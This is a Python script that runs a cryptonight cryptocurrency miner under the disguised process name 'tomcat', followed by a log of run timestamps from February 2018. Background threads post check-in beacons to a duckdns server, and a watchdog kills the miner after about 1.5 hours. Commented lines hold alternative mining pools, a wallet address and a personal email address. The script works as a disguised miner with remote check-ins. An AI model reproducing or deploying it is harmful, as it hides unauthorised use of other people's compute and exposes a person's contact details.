import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:11:04.929456
#2018-02-17 15:59:06.592136
#2018-02-17 17:47:08.684456
#2018-02-17 19:34:05.054208
#2018-02-17 21:23:04.080531
#2018-02-17 23:07:01.551598
#2018-02-18 00:54:05.844318
#2018-02-18 02:42:04.875350
#2018-02-18 04:31:01.528366
#2018-02-18 06:22:05.740831
#2018-02-18 08:12:06.353531
#2018-02-18 09:59:07.317703
#2018-02-18 11:47:01.491991
#2018-02-18 13:32:01.894917
#2018-02-18 15:22:04.473651
#2018-02-18 17:11:04.870086
#2018-02-18 18:59:05.775263
#2018-02-18 20:46:02.020728
#2018-02-18 22:33:01.482922
#2018-02-19 00:21:03.461466
#2018-02-19 02:07:01.723578
#2018-02-19 03:54:01.570841
#2018-02-19 05:38:06.774943
#2018-02-19 07:26:04.552352
#2018-02-19 09:16:06.054489
#2018-02-19 11:05:09.545741
#2018-02-19 12:52:08.454824
#2018-02-19 14:41:08.034574
#2018-02-19 16:31:09.985825
#2018-02-19 18:19:02.236727
#2018-02-19 20:05:02.699802
#2018-02-19 21:56:04.527956
#2018-02-19 23:41:06.310979
#2018-02-20 01:28:05.204630
#2018-02-20 03:16:05.037861
#2018-02-20 05:03:04.013397
#2018-02-20 06:45:01.468844
#2018-02-20 08:31:08.218569
#2018-02-20 10:15:10.483861
#2018-02-20 11:59:06.405047
#2018-02-20 13:47:09.880213
#2018-02-20 15:32:09.278069
#2018-02-20 17:18:09.026896
#2018-02-20 19:09:02.200741
#2018-02-20 20:57:06.137865
#2018-02-20 22:43:03.387761
#2018-02-21 00:26:06.212212
#2018-02-21 02:12:02.220277
#2018-02-21 03:58:03.541105
#2018-02-21 05:47:05.177165
#2018-02-21 07:35:08.595282
#2018-02-21 09:20:03.940374
#2018-02-21 11:09:01.556995
#2018-02-21 12:56:10.765217
#2018-02-21 14:44:07.605850
#2018-02-21 16:33:01.944845
#2018-02-21 18:23:04.906984
#2018-02-21 20:10:07.539832
#2018-02-21 21:59:04.910008
#2018-02-21 23:46:01.336880
#2018-02-22 01:35:07.187644
#2018-02-22 03:24:03.768900
#2018-02-22 05:12:05.805957
#2018-02-22 06:55:09.732475
#2018-02-22 08:42:07.733947
#2018-02-22 10:29:05.459896
#2018-02-22 12:14:06.255278
#2018-02-22 14:00:10.591831
#2018-02-22 15:49:02.138355
#2018-02-22 17:36:04.658883
#2018-02-22 19:24:05.005001
#2018-02-22 21:17:02.020558
#2018-02-22 23:02:05.250795
#2018-02-23 02:29:07.632798
#2018-02-23 04:17:05.756840
#2018-02-23 06:03:03.988500
#2018-02-23 07:48:02.036893
#2018-02-23 09:49:07.767727
#2018-02-23 11:55:03.057279
#2018-02-23 13:44:12.221339
#2018-02-23 15:32:04.931718
#2018-02-23 17:20:06.470972
#2018-02-23 19:04:07.320492
#2018-02-23 20:50:06.461550
#2018-02-23 22:32:07.543919
#2018-02-24 00:19:06.528315
#2018-02-24 02:09:07.205451
#2018-02-24 03:59:05.650143
#2018-02-24 05:44:07.283605
#2018-02-24 07:37:01.733818
#2018-02-24 09:22:01.279606
#2018-02-24 11:15:04.057836
#2018-02-24 13:04:06.429813
#2018-02-24 14:54:06.218912
#2018-02-24 16:45:08.941128
#2018-02-24 18:33:04.829158
#2018-02-24 20:19:06.016555
#2018-02-24 22:14:04.665216
#2018-02-25 01:23:01.785280
#2018-02-25 03:59:05.060828
#2018-02-25 07:39:05.183040